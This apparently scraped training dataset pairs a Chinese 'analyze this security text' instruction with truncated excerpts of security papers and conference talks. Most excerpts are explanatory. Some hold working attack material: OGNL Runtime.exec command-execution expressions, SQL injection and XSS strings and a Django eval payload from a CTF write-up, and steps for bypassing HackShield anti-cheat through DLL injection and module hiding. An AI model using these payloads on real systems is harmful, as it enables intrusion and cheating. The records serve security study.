DE3D F8B5 06E4 A169 4E46  SANS Institute 2004, As part of GIAC practical repository. Author retains full rights. Herschel Gelman SANS GSNA Practical Assignment Version 3.1  Option 1 2 ABSTRACT This paper contains an audit of a web application available on the Internet that is run on PHP, MySQL, Apache, and Linuxa combination commonly known as a LAMP system. As a web hosting company hosts the application, the scope of the audit encompasses only those components available to the developer: the PHP source code and any site configuration options available to the developer. In the first section, the paper will cover initial research into the system, risks to the system, and current practices regarding web application security. Part two contains the audit checklist, with testing procedures and compliance criteria. Part three gives the results of the audit. Part four contains the audit report, listing the findings and recommendations.  SANS Institute 2004, Author retains full rights. Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  SANS Institute 2004, As part of GIAC practical repository. Author retains f", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n##Smashthestate (Web, 400p) This beautiful website for testing zip files contains a replica of a vulnerability found in a well known bug bounty site. Log in with rob:smashthestate then exploit the vulnerability to gain access to the 'admin' account and the flag. Automated tools and bruteforcing will not help you solve this challenge. ###PL [ENG](#eng-version) ###ENG version", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nConfluence EL Injection via OGNL 0x00 前言 上一篇文章Confluence SSTI via Velocity中的漏洞原理较为简单采用了正向分析的方法去还原漏 洞挖掘的过程这篇文章主要从补丁去逆向分析尝试独立构造出 POC 0x01 简介 本文将要介绍以下内容: 介绍OGNL 基本语法 & 内置沙箱机制并通过一些例子进行初步掌握 梳理 Confluence 处理 HTTP 请求的基本流程 分析 CVE-2022-26134 的补丁然后独立构造 Exploit 0x02 表达式语言 OGNL OGNL 部分: OGNL 介绍 基本使用 (能看懂并定制 poc/exp) 实战利用 (命令执行/回显/文件写入) 了解 OGNL 尽量从官方文档了解因为信息在网上的多次传播后难免有失真的可能性 OGNL (Object-Graph Navigation Language) is an expression language for getting and setting properties of Java objects (操作 Java 对象的属性) 基本语法和使用 0基本单元 The fundamental unit(基本单元) of an OGNL expression is the navigation chain(导航 链), usually just called \"chain\" 说明 OGNL 支持链式调用, 是以 .点号进行串联的一个链式字符串表达式 例子 伪代码 class people{ name = \"zhang san\" fullName = {\"zhang\",\"san\"} getAge(){ return \"18\" } } Confluence EL Injection via OGNL No. 1 / 22 Expression Element(元素) Part Example Property(属性) names 获取 people 的 name 属性可用people.name 表示 Method Calls 获取 people 的 age 属性可用people.getName() 表 示 Array Indices(数组索引) 获取 people 的姓氏 可用 people.fullName[0] 表示 1三要素 通俗理解理解就和解语文的阅读理解题一样需要搞清楚 故事OGNL 表达式表示执行什么操作 人物OGNL ROOt对象表示被操作的对象是谁 地点OGNL 上下文环境表示执行操作的环境在哪 2常见符号介绍 Confluence EL Injection via OGNL No. 2 / 22 操作 符 说明 . 调用对象的属性方法 @ 调用静态对象静态方法静态变量 # 定义变量调用非root对象访问 this 变量(当前调用者对应的实例) ${} 引入 OGNL 表达式形如 ${xxxx} % 表达式声明形如 %{xxxx},告诉执行环境 xxxx 是OGNL表达式需要被计算 {} 构造 List形如{\"aaa\", \"bbb\"} } 构造 Map形如#{\"a\" : \"12345\", \"b\" : \"67890\"} this 当前对象所对应的实例通过 #this 调用 new 可用已知对象的构造函数来构造对象形如new java.net.URL(\"http:www.xxx.com/\") 3初阶使用 通过例子了解OGNL为何会从 feature 成为 vulnerability 1. 可调用静态方法 OgnlContext context = new OgnlContext(); String expression = \"@java.lang.Runtime@getRuntime().exec(\\\"calc\\\")\"; Ognl.getValue(expression,context); Confluence EL Injection via OGNL No. 3 / 22 2. 定义变量传参方法调用 3. new 关键字创建对象 OgnlContext context = new OgnlContext(); String expression = \"#cmd='notepad',\" + \"@java.lang.Runtime@getRuntime().exec(#cmd)\"; Ognl.getValue(expression,context); OgnlContext context = new OgnlContext(); String expression = \"(new java.lang.ProcessBuilder(new java.lang.String", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n大可(Dark)  熟悉的語言:C/C++ , PASCAL , ASM  專長:windows 程式設計&逆向工程  講課經驗:在ZCamp2008講過課  興趣:程式設計&資訊安全&美食&聊天&動漫& 睡覺&看電影&聽音樂&彈鋼琴&打電玩  Hackshield是一款防止外掛程式的入侵的軟件 執行遊戲時Hackshield會偵防外掛使用者的 電腦 並封鎖不正常的程式碼 有效防止按鍵 精靈加速器等的外掛的運行  轉自  http://eco.gamecyber.com.tw/tw/hanckshield01.html  CE (Cheat Engine)  讀寫記憶體  按照使用者指定的方式去比對記憶體的資料  有開放原始碼  UCE(Undetected Cheat Engine)  防外掛軟體會封鎖CE  有人改CE原始碼,改成防外掛檢測不到  不需要再去找Bypass HS(hackshield)版的UCE  也不用自己修改CE原始碼  可以寫一個程式 , 使任何工具繞過HS  其實這部分很容易, 前提是要知道如何繞過HS  可以把繞過HS的方法,寫成DLL  然後把DLL inject到指定的外掛工具中 可以歸納為\"攻\" 與 \"守\" 兩個動作  目的:偵測對遊戲不利的程式  inline hook SSDT- NtDeviceIoControlFile:  攔截分析: 由於CE(Cheat Engine)從driver呼叫 CE內 部的OpenProcess方式所以Usermode 必須呼叫 DeviceIoControl 跟 driver交換訊息  不定期取得process的資訊  enum window尋找可疑的視窗  目的:讓遊戲記憶體不被外部程式Access,並防止HS遭修改  Inline hook SSDT- NtOpenProcess  防止被外部程式獲得Process Handle  然而工作管理員卻是白名單(可以給我們利用)  Hook shadow SSDT-NtUserSendInput  防止模擬鍵盤滑鼠輸入  此外會不定期對遊戲的code segment做CRC check  防止遊戲程式碼被修改!  Inline hook SSDT NtReadVirtualMemory  防止遊戲記憶體被讀取  Inline hook SSDT NtWriteVirtualMemory  防止遊戲記憶體被寫入  外掛也可以分為攻與守兩個方式  攻:繞過,防護對遊戲記憶體做讀寫  守:防止工具被HS檢驗到  上面兩點都達到大概就圓滿落幕了  Hook NtLoadDriver  這樣就能使HS的驅動不正常運作 但是  防外掛不只包含那個驅動, 有其他模組會檢查HS 驅動執行是否正常  不正常就關閉遊戲  追蹤 HS載入的地方  修改程式完全拔掉 HS  可以完全拔掉... 但是  遊戲會發\"確認HS運作正常\"的封包  如果破壞 hackshield 的完整性  要進行繁瑣的修復動作  分析伺服器送出的確認封包  模仿加密過程送出  才能讓遊戲正常執行  So , 選擇與hackshield共存  透過hook , 來載入我們的dll  防止 HS對Executable Module list做驗證  dll injection成功之後,把dll module給隱藏  就能直接存取遊戲的記憶體空間  別用ReadProcessMemory 或 WriteProcessMemory讀寫記憶體  遊戲有對這兩個API做Inline SSDT Hook  找到PEB(Process Environment Block)  在fs[0x30]可以找到peb ,像這樣 mov eax , fs: [0x30]  到PEB->Ldr, 去enum下面三個module的List_Entry 結構  InLoadOrderModuleList  InMemoryOrderModuleList  InInitializationOrderModuleList  比對module,把要隱藏的module連結弄斷  Current->Blink->Flink=Current->Flink  Current->Flink->Blink=Current->Blink  指定的dll module就會被孤立  開工作管理員可以結束掉遊戲的process  可見工作管理員能對遊戲做OpenProcess的動作  工作管理員(taskmgr.exe)在HS的白名單裡面  從 PEB 到 _RTL_USER_PROCESS_PARAMETERS 結構 改掉ImagePathName來偽裝 void Fake_Fake_FakeXD (WCH", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n针对家在作业常的些问题作了些汇总 1. goby的指纹感觉不那么好 会有很多误报 对goby指纹些字段的理解不太清晰如何处理goby的指纹 2. 如何实现程序让速度和效率最化 这给出我的些思考的想法和过程 goby指纹的处理 第期作业中提取出了goby指纹并将它转换为了json格式第期我的提取法https://t.zsxq.com/eiQVRZv 多看个规则差不多就能把规则了解清楚了 { \"rule_id\": \"1\", // id没啥 \"level\": \"5\", // 暂时不知道有什么 \"softhard\": \"2\", // 是否是硬件 1 硬件 2 软件 \"product\": \"PHPSHE\", // 产品名称 \"company\": \"haovip\", // 产品公司 \"category\": \"Other Software System\", // 类别 可以看到每个规则都有个match字段代表如何匹配的我们可以写个python程序看看有多少种匹配的式以及 分别有多少 输出 \"parent_category\": \"Software System\", // 上类 \"rules\": [ [ { \"match\": \"body_contains\", \"content\": \"powered by phpshe\" } ], [ { \"match\": \"body_contains\", \"content\": \"content=\\\"phpshe\" } ] ] // rules是个list每个list是 or 关系 // list下也是list这个list是 and 关系 } import json filename = \"fofa.json\" with open(filename, 'r', encoding=\"utf-8\") as f: data = json.load(f) print(\"count\", len(data)) i = 0 dd = {} for item in data: for rules in item[\"rules\"]: for rule in rules: match = rule[\"match\"] if match not in dd: dd[match] = 0 dd[match] += 1 import json print(json.dumps(dd,indent=4)) count 6098 // 指纹总数 { \"body_contains\": 5685, \"protocol_contains\": 209, \"title_contains\": 1880, \"banner_contains\": 3532, 再看看每个类别的数是多少,python代码如下 输出 \"header_contains\": 1597, \"server_contains\": 454, \"server\": 5, \"title\": 171, \"cert_contains\": 203, \"port_contains\": 6, \"protocol\": 1 } import json filename = \"fofa.json\" with open(filename, 'r', encoding=\"utf-8\") as f: data = json.load(f) i = 0 dd = {} for item in data: parent_category = item[\"parent_category\"] category = item[\"category\"] if parent_category not in dd: dd[parent_category] = {} if category not in dd[parent_category]: dd[parent_category][category] = 0 dd[parent_category][category] += 1 import json print(json.dumps(dd, indent=4)) { \"Software System\": { \"Other Software System\": 339, \"Database System\": 32, \"Operating System\": 60 }, \"Enterprise Application\": { \"OA\": 61, \"Other Enterprise Application\": 653, \"Electronic Mail System\": 106, \"CRM\": 38, \"ERP\": 26, \"Project Management System\": 31, \"FMS\": 21, \"HRM\": 13, \"SCM\": 3", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n由電腦鑑識看帳號 由電腦鑑識看帳號/密碼的竊取 密碼的竊取 2009/July 2009/July 講師 講師:鑒真數位 鑒真數位 黃敬博 黃敬博 po@iforensics.com.tw po@iforensics.com.tw (EnCE/CCE/CIFI/CHFI/CEH/CISSP) (EnCE/CCE/CIFI/CHFI/CEH/CISSP) PDF created with pdfFactory Pro trial version www.pdffactory.com 簡報大網 簡報大網 帳號密碼遭竊的嚴重性 不可知的殘留 帳號/密碼存在的位置及方式 破密的邏輯 常用的竊取手法 問題與討論 PDF created with pdfFactory Pro trial version www.pdffactory.com 國內趨勢 國內趨勢  根據內政部警政署的統計資料顯示 根據內政部警政署的統計資料顯示 去年 去年(97 (97年)妨害電腦使用案犯罪方式第一名為 妨害電腦使用案犯罪方式第一名為 無故取得刪除或變更他人電腦或電磁紀錄 無故取得刪除或變更他人電腦或電磁紀錄 (56.47%) (56.47%) PDF created with pdfFactory Pro trial version www.pdffactory.com 案例說明 案例說明  Yahoo Yahoo 帳號失竊案例 帳號失竊案例  網路犯罪最愛偷的帳號 網路犯罪最愛偷的帳號 若是Gmail 遭竊 ? PDF created with pdfFactory Pro trial version www.pdffactory.com 有組織的犯罪結構 有組織的犯罪結構  中國駭客黑色產業鏈 中國駭客黑色產業鏈:2.38 :2.38億年產值帶來 億年產值帶來76 76 億損失 億損失  僵屍電腦租借 僵屍電腦租借  帳號 帳號/密碼 密碼 (其中每天有超過上萬人次填寫申訴 其中每天有超過上萬人次填寫申訴 資料反映 資料反映QQ QQ密碼被盜 密碼被盜) PDF created with pdfFactory Pro trial version www.pdffactory.com 簡報大網 簡報大網 帳號密碼遭竊的嚴重性 不可知的殘留 帳號/密碼存在的位置及方式 竊取的手法 破密的邏輯 問題與討論 PDF created with pdfFactory Pro trial version www.pdffactory.com 不可知的殘留 不可知的殘留  根據加州柏克萊大學的研究目前公司中 根據加州柏克萊大學的研究目前公司中 有超過 有超過93% 93%的資訊產出是以數位格式分散貯 的資訊產出是以數位格式分散貯 存在各個系統中同時相同的研究也指出 存在各個系統中同時相同的研究也指出 在所有的資訊犯罪侵權案例中有超過 在所有的資訊犯罪侵權案例中有超過 85% 85%的案例均會留下數位遺趾 的案例均會留下數位遺趾 (Foot print) (Foot print) Ł 示範 示範 PDF created with pdfFactory Pro trial version www.pdffactory.com 硬碟 硬碟Unallocate Unallocate區的殘留 區的殘留  File Slack File Slack  Unallocated cluster Unallocated cluster  Hardisk Unallocated area Hardisk Unallocated area PDF created with pdfFactory Pro trial version www.pdffactory.com 虛擬記憶體的殘留 虛擬記憶體的殘留  Pagefile.sys Pagefile.sys 為Windows Windows平台中的虛擬記憶體 平台中的虛擬記憶體,程式執行中 程式執行中 的資訊很多會殘留在此部份 的資訊很多會殘留在此部份,且可能以明文 且可能以明文 的方式顯示 的方式顯示  帳號 帳號/密碼 密碼  Instant Message Instant Message 聊天的內容 聊天的內容 PDF created with pdfFactory Pro trial version www.pdffactory.com Windows Windows 休眠 休眠  Hibernate.sys Hibernate.sys 及 Hiberfil.sys Hiberfil.sys 為Windows Windows平台中休眠時將記憶體中的資 平台中休眠時將記憶體中的資 訊貯存檔案名稱可於停止休眠時迅速回 訊貯存檔案名稱可於停", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nReverse Engineering the Tesla Battery Management System to Increase Power Available Patrick Kiley 2 Patrick Kiley  Principal Security Consultant - Rapid7  Member of the Penetration Testing team at Rapid7  Performed research in Avionics security  Internet connected transportation platforms.  Experience in hardware hacking, IoT, Autonomous Vehicles, and CAN bus. 3 Topics  Architecture of the Model S and Battery Management System(BMS)  Performance and Ludicrous timeline  Hardware changes  Data stored in toolbox  Firmware changes  Shunt modification  Upgrade process  Failure and what I learned  Next steps 4 Model S Architecture  Central Information Display (CID): Nvidia Tegra based  Gateway: a security component, stores vehicle configuration, sits between the various CAN buses and the CID  Powertrain (PT) CAN bus, contains the BMS, Drive units, charging, thermal control and other powertrain related controllers  PT CAN runs at 500 kBit/sec and is a standard vehicle CAN bus (differential signaling, 11 bit arb ids, etc)  PT CAN supports UDS standard. 5 BMS Overview  TI TMS320C2809  Main microprocessor  Altera CPLD  Hardware backup for TMS320  Current Shunt with STM8 , measures current coming from the battery  Precharge Resistor, prevents inrush current damage  BMB boards on each battery pack, these include bleed resistors to balance packs All the firmware changes are on the TMS320 Some settings are changed on the shunt, in addition it has a small physical modification Full reversing of all the components is an ongoing project, so if you want to help, I am lacking in some of the skill areas. BMS with Components 6 7 Ludicrous History  P85D announced on Oct 10, 2014  Ludicrous announced on July 17, 2015  10K for new buyers, 5K for existing P85D owners  Upgrade involved new contactors and pyro fuse  Many performance battery packs would come standard with new components  They were ludicrous capable,  All 100kWh performance battery packs are ludicrous capable  Ludicrous capable ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n{ Breaking the x86 ISA domas / @xoreaxeaxeax / DEF CON 2017 Christopher Domas Cyber Security Researcher @ Battelle Memorial Institute ./bio 8086: 1978 A long, tortured history The x86 ISA Modes: Real (Unreal) Protected mode (Virtual 8086, SMM) Long mode (Compatibility, PAE) x86: evolution Instruction sets x86: evolution Modern x86 chips are a complex labyrinth of new and ancient technologies. Things get lost 8086: 29,000 transistors Pentium: 3,000,000 transistors Braodwell: 3,200,000,000 transistors x86: evolution We dont trust software. We audit it We reverse it We break it We sandbox it Trust. But the processor itself? We blindly trust Trust. Why? Hardware has all the same problems as software Secret functionality? Appendix H. Bugs? F00F, TSX, Hyperthreading. Vulnerabilities? SYSRET, cache poisoning, sinkhole Trust. We should stop blindly trusting our hardware. Trust. What do we need to worry about? Well known from software Examples Backdoors Hardware FPGAs Hypervisors Microcode Supply chain Backdoors Could a hidden instruction unlock your CPU? Hidden instructions Historical examples ICEBP apicall Hidden instructions Hidden instructions Traditional approaches: Leaked documentation Reverse engineering software NDA But what if its something stealthy? Hidden instructions Find out whats really there Goal: Audit the Processor How to find hidden instructions? Approach Instructions can be one byte  inc eax 40  or 15 bytes ... lock add qword cs:[eax + 4 * eax + 07e06df23h], 0efcdab89h 2e 67 f0 48 818480 23df067e 89abcdef Somewhere on the order of 1,329,227,995,784,915,872,903,807,060,280,344,576 possible instructions Approach https://code.google.com/archive/p/corkami/wikis/x86oddities.wiki The obvious approaches dont work: Try them all? Only works for RISC Try random instructions? Exceptionally poor coverage Guided based on documentation? Documentation cant be trusted (thats the point) Poor coverage of gaps in the search space Approach A depth-first-search algorithm (Over", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Art and Science of Security Research The Art and Science of Security Research Gregory Conti gregory.conti@usma.edu Gregory Conti gregory.conti@usma.edu http://commons.wikimedia.org/wiki/File:Venus_botticelli_detail.jpg The views expressed in this presentation are those of the author and do not reflect the official policy or position of the United States Military Academy, the Department of the Army, the Department of Defense or the U.S. Government. http://commons.wikimedia.org/wiki/File:Blurry_Prison.jpg I am not a lawyer http://commons.wikimedia.org/wiki/File:Honor%C3%A9_Daumier_018.jpg What is Research? The search for knowledge, with an open mind, to establish novel facts, solve new or existing problems, prove new ideas, or develop new theories, usually using a scientific method. http://en.wikipedia.org/wiki/Research Paywall Edge of Human Knowledge Books Courses Science Fiction Future Work Research Papers Future Work Science Fiction Present 10 years 50 years Proprietary Classified Why Research?  Advance human knowledge  Give back, so others can take your work to the next level  Make yourself an expert  Valuable skill set  Fun and rewarding  Get credit, notoriety, profit  Build you resume  You are already doing the work http://commons.wikimedia.org/wiki/File:Beakers.jpg What hackers bring to the table  Native curiosity  Cleverness  Color outside the lines  Hackers do great work  Less constraints, Less fear  Freedom to choose problems that industry or academia cant/wont touch  Hackers can build things  Inspiration and obsession  Devious minds  Interesting ideas  Access to interesting data  Interesting acquaintances http://commons.wikimedia.org/wiki/File:Lamborghini_Revent%C3%B3n_coloring.jpg http://commons.wikimedia.org/wiki/File:Noise_makers.jpg Seek to be the World Expert  Or at least an expert  N world experts in the room  Momentum  Once at edge you will see problems (and solutions) that others dont know exist In fact, researchers have settled on what they bel", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWindows GDI Local Kernel Memory Overwrite Vulnerability researched and exploit developed by Joel Eriksson <joel.eriksson@bitsec.com> About the bug The Graphics Device Interface, GDI, is part of the Win32-subsystem and is responsible for displaying graphics on devices such as video displays as well as printers. Basic information about all GDI objects on the system are stored in a shared memory section named GdiSharedHandleTable. This table is automatically mapped read-only into every GUI-process on the system and its contents are only updated by the kernel. Well, that is how it was supposed to be anyway. If one is able to determine the handle to the GdiSharedHandleTable shared memory section, it is possible to make an alternate mapping with full read-write access. Being able to write to data which only the kernel is supposed to write to can never be a good thing, depending on ones perspective of course. This bug was found and reported to Microsoft by Cesar Cerrudo from Argeniss over two and a half years ago now (2004-10-22), but was not made public until the Month of Kernel Bugs project [1] in November 2006. Windows 2003 and Vista is not vulnerable, but all releases of Windows 2000 and XP were, until a couple of weeks after our talk at BlackHat Europe when a patch was released. ;) When Cesar made the bug public, he made a PoC exploit available for crashing the system by filling the entire table with 0x58-chars. I expected a real exploit for the bug to be released shortly afterwards, but time went by and neither an exploit nor a patch was released. In January I decided to give it a try myself. By this time I had no idea whether it was even possible to reliably exploit this vulnerability, since it was far from obvious judging from the PoC exploit and the crash it produced due to a read from NULL pointer. Reliably determining the GDI section handle The first problem I faced was to come up with a reliable way for determining the handle to the shared memory section. The P", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFor little or no money What is a Security Opera0ons Center (SOC) Events IDS Management System Analyst Systems Analysts Contextual Info Reporting Incident Response Why do you need a SOC? Central location to collect information on threats  External Threats  Internal Threats  User activity  Loss of systems and personal or sensitive data  Provide evidence in investigations Keep your organization running  Health of your network and systems Isnt a Firewall, IDS or AV enough?  Firewall is active and known by attackers  Protects your systems, not your users  Anti-Virus  Lag-time to catch new threats  Matches files, but not traffic patterns.  IDS alerts on events, but doesnt provide context  System logs  Proxy logs  DNS logs  Information from other people Private Network People Management Users Other Experts Analysts Lab Analyst Systems Management Systems IDS Structure of a SOC vs Techie using real-time tech 24/7 Private network  Secure communication between  IDS  Management System  Analyst Systems  Management and update of IDS and rules IDS system Secured OS IDS Software  Snort  Barnyard2  Pulled Pork  stunnel Packet capture  TCPDump  Daemonlogger Management system Secured OS LAMP Management Software  BASE, Snorby, OCCIM, Splunk, Nagios, etc. Analyst Systems Secured OS Management System Interface Analysis tools  Wireshark  Tcpdump  Netwitness But I thought you wanted a secure system! Lab  Test system  Test rules on the IDS  Test Configuration changes  Can be used as a backup  A safe environment to:  Play with malware  Try hacks These activities can help you to discover the criteria to build custom rules for the IDS. Its probably a good idea to use VMs for your lab. Analysts (the meat of the opera0on)  You need highly skilled people who: Know networking Understand attacks Understand Malware Are comfortable with things like source code, hex, etc Are open to new ideas Are creative thinkers Are good at deductive reasoning and critical thinking Have a passion for this Dont blink Don", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTrooping to Taiwan: Technical Sophistication and Connections in Closed Espionage Ecosystems Matt Brooks, Citizen Lab Campaign Connections Challenges Conclusion Campaign DMShell++ Campaign Success  At least one target fell victim  Interesting post-compromise tactic  Detection avoidance?  Better server-side component?  Hand-off Campaign Takeaways  Largely based on publicly available content  Excellent social engineering, average technical sophistication  No 0day  Custom implants  Still successful Campaign Connections Campaign Connections Challenges Connections  First order - directly observed  Second order - infrastructure  Nth order  Code reuse  Shared development technique?  Uncommon naming convention? Closed Espionage Ecosystems Su Bin Arrested: 28 June 2014 Sentenced: 13 July 2016 Worked with 2 unnamed co-conspirators to identify and sell information stolen using malware intrusions Interesting glimpse into resources of people and organizations responsible for malware intrusions Group Size Source: Source: https://www.justice.gov/opa/pr/chinese-national-pleads-guilty-conspiring-hack-us-defense-contractors-systems-steal-sensitive Cost Source: Source: https://www.justice.gov/opa/pr/chinese-national-pleads-guilty-conspiring-hack-us-defense-contractors-systems-steal-sensitive Final Customer Source: Source: https://www.justice.gov/opa/pr/chinese-national-pleads-guilty-conspiring-hack-us-defense-contractors-systems-steal-sensitive Final Customer Source: Source: https://www.justice.gov/opa/pr/chinese-national-pleads-guilty-conspiring-hack-us-defense-contractors-systems-steal-sensitive Additional Collection Priorities Source: Source: https://www.justice.gov/opa/pr/chinese-national-pleads-guilty-conspiring-hack-us-defense-contractors-systems-steal-sensitive Campaign Connections Challenges Conclusion Parting Thoughts  There are enough public, basic tools enabling average actors to cause harm  Closed espionage ecosystems make it difficult to accurately segment and describe har", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### ret2csu原理 在 64 位程序中函数的前 6 个参数是通过寄存器传递的但是大多数时候我们很难找到每一个寄存器对应的gadgets 这时候我们可以利用 x64 下的 __libc_csu_init 中的 gadgets这个函数是用来对 libc 进行初始化操作的而一般的程序都会调用 libc 函数所以这个函数一定会存在我们先来看一下这个函数(当然不同版本的这个函数有一定的区别) ```asm .text:00000000004005C0 ; void _libc_csu_init(void) .text:00000000004005C0 public __libc_csu_init .text:00000000004005C0 __libc_csu_init proc near ; DATA XREF: _start+16o .text:00000000004005C0 push r15 .text:00000000004005C2 push r14 .text:00000000004005C4 mov r15d, edi .text:00000000004005C7 push r13 .text:00000000004005C9 push r12 .text:00000000004005CB lea r12, __frame_dummy_init_array_entry .text:00000000004005D2 push rbp .text:00000000004005D3 lea rbp, __do_global_dtors_aux_fini_array_entry .text:00000000004005DA push rbx .text:00000000004005DB mov r14, rsi .text:00000000004005DE mov r13, rdx .text:00000000004005E1 sub rbp, r12 .text:00000000004005E4 sub rsp, 8 .text:00000000004005E8 sar rbp, 3 .text:00000000004005EC call _init_proc .text:00000000004005F1 test rbp, rbp .text:00000000004005F4 jz short loc_400616 .text:00000000004005F6 xor ebx, ebx .text:00000000004005F8 nop dword ptr [rax+rax+00000000h] .text:0000000000400600 .text:0000000000400600 loc_400600: ; CODE XREF: __libc_csu_init+54j .text:0000000000400600 mov rdx, r13 .text:0000000000400603 mov rsi, r14 .text:0000000000400606 mov edi, r15d .text:0000000000400609 call qword ptr [r12+rbx*8] .text:000000000040060D add rbx, 1 .text:0000000000400611 cmp rbx, rbp .text:0000000000400614 jnz short loc_400600 .text:0000000000400616 .text:0000000000400616 loc_400616: ; CODE XREF: __libc_csu_init+34j .text:0000000000400616 add rsp, 8 .text:000000000040061A pop rbx .text:000000000040061B pop rbp .text:000000000040061C pop r12 .text:000000000040061E pop r13 .text:0000000000400620 pop r14 .text:0000000000400622 pop r15 .text:0000000000400624 retn .text:0000000000400624 __libc_csu_init endp ``` 这里我们可以利用以下几点 - 从 0x000000000040061A 一直到结尾我们可以利用栈溢出构造栈上数据来控制 rbx,rbp,r12,r13,r14,r15 寄存器的数据 - 从 0x0000000000400600 到 0x000000", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n华山杯 writeup 队伍名Nu1L Web 题目 Web1 怎么在 Web 上 Ping 呢 进去发现 flag.php访问不到直接抓包访问之后发现在 flag.php 中存 在提示 keyDDoS研究一下午不懂后来在 freebuf 找到一篇文章 http://www.freebuf.com/articles/network/74173.html 构造 html 访问fiddler 抓包 Flag : cCFVY1Yjs5VQ9X2GCG4v6IdpkaKBEsbM Web2 社工库查询 放西瓜大神好吗天真的以为真的是社工 QQ Burp 爆破到 10000发现出来了提示 Intavl取整函数尝试输入 10000.1 就可以得到 flag Web3access 注入 一开始以为是 sqlmap 能爆破出来然而太天真了一开始就是猜猜 猜没思路突然发现 access 注入有一种偏移注入然后就秒破真的好简单 - -怪不得大牛都秒了 找到一篇文章http://www.2cto.com/Article/201212/179284.html然 后就猜字段数吧: http://218.245.4.113:8888/web03/ca55022fa7ae5c29d179041883fe1556/ind ex.asp?id=886 union select 1,2,3, 4,* from admin as a inner join admin as b on a.id=b.id Md5 解下469e80d32c0559f8发现时 admin888直接提交通过 Flag469e80d32c0559f8 Web4 有 WAF 该怎么注入呢 白天注入的时候各种绕不过去后来想到 xd 比赛的那个函数 lpad 发 现可以执行但是不知道暴啥晚上的时候发现什么都没过滤 于是翻了翻以前 nsctf 的 writeup找到了一个盲注语句然后就是 brupsuite 爆破了想写本来以为 flag 没几位最后发现好长啊 (ord(substr((select(select(group_concat(table_name))from(information _schema.tables)where(table_schema=database()))),1,1))>100) 先爆表名发现是 flag 表之后爆字段发现是 flag所以直接 (ord(substr((select(flag)from(flag)),i,1))>j) 手动爆表 20 分钟 得到完全没有意义的字符串 所以 flag 第一位是 chr(106) Flag:jkschvkjasmznxvkjahsdasdxzcqwe Web5 XSS??? XSS!!! 第一节 xss 挑战赛的原题啊http://drops.wooyun.org/papers/894 \"onblur=outerHTML=URL//#<img/src=1 onerror=alert(1)> 尝试提交不行找了个不可见字符改成 \"OnbLur=outerHTML=URL%0b#<img/src=1 onerror=alert(1)> 弹窗成功win7+ie8 Web6 Python-Web 题目很纠结测试发现是 django 的 debug 模式 尝试在 rest 下用 obj 构建链接然后就可以了开始我们引入的 model 是 exec 后来发现不存在于是尝试引入同样可以执行 os 命令的 eval利用 http://www.freebuf.com/articles/web/73658.html 上的讲解去执行 python 命令发现 os.system 竟然不能用不能写入文件于是 help 了 os 发现 listdir 同样可以列出目录执行{\"obj\": \"__builtin__\", \"method\": \"eval\", \"params\": \"[__import__('os').listdir('.'),1]\"}发现目录然后 多次测试os.stat 一个文件尝试找 username 没有password 是一串 *******************后来包含了多个文件发现在 debug 的 setting 信 息中直接有 flag Flag  31e262014a402b9f7d2dc9970cf39ca5 网络取证 网络取证 1 流量分析 1 因为有的时候对于 ping 的检验很少所以筛选出 icmp查看 request 即 可发现每一个流量包有一个字符 然后得到 flagS$curIty_I_L0V3_H@cK 网络取证 2 扫雷 将下载下来的压缩包打开发现是个 dmp 文件用 windbg 打开通过 lm 和.write", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRESEARCH ON THE MACHINES HELP THE FTC PROTECT PRIVACY AND SECURITY Humans User: Terrell McSweeny Function: Commissioner, FTC User: Lorrie Cranor Function: Chief Technologist, FTC Machines Speech Schematics Privacy & Security Protections Now Issues of the Day We Need Your Help! How does the FTC respond to the Rise of the Machines? When machines are everywhere? What does the FTC do? Unfair Deceptive What do unfair and deceptive mean?  Unfair =  Substantial Injury to Consumers  Unavoidable  Not Outweighed Procompetitive By Benefits  Deceptive =  Act Likely to Mislead Consumers  Unreasonable  Material For Example  Facebook promised to keep personal info safe, but allowed 3rd party access Snapchat promised images would disappear, but kept them Wyndham unfairly exposed consumers payment-card info in three separate data breaches For Example  Google promised Gmail contacts wouldnt be used elsewhere, but used them in its social-media site, Buzz ASUS promised its routers would protect local network against attacks, but failed to update them enough ORACLE promised its updates would protect consumers, but didnt protect older versions of Java SE. PII FCC NHTSA DOE FAA HIPPA Defenseless Data FACTA ECOA COPPA FCRA FTC Act FTC Current Issues Office of Technology Research & Investigation 2016 Fall Technology Series Ransomware September 7 Drones October 13 Smart TV December 7 ftc.gov/tech Putting Disclosures to the Test September 15, 2016 ftc.gov/tech ftc.gov/tech January 12, 2017 Research Wish List: What is the FTC looking for? We want  Research On Privacy and Security  What value do consumers put on various aspects of privacy in different contexts?  How can we assess the risk of harm from security and privacy breaches?  How can we trace the illegal sale of identity info back to a particular breach?  How can interventions make attacks less economically viable?  What does the FTC need to know to protect consumers from ransomware, malvertising, etc?  Research to Enhance Fraud Detectio", "category": "text_analysis", "source": "security_papers"}
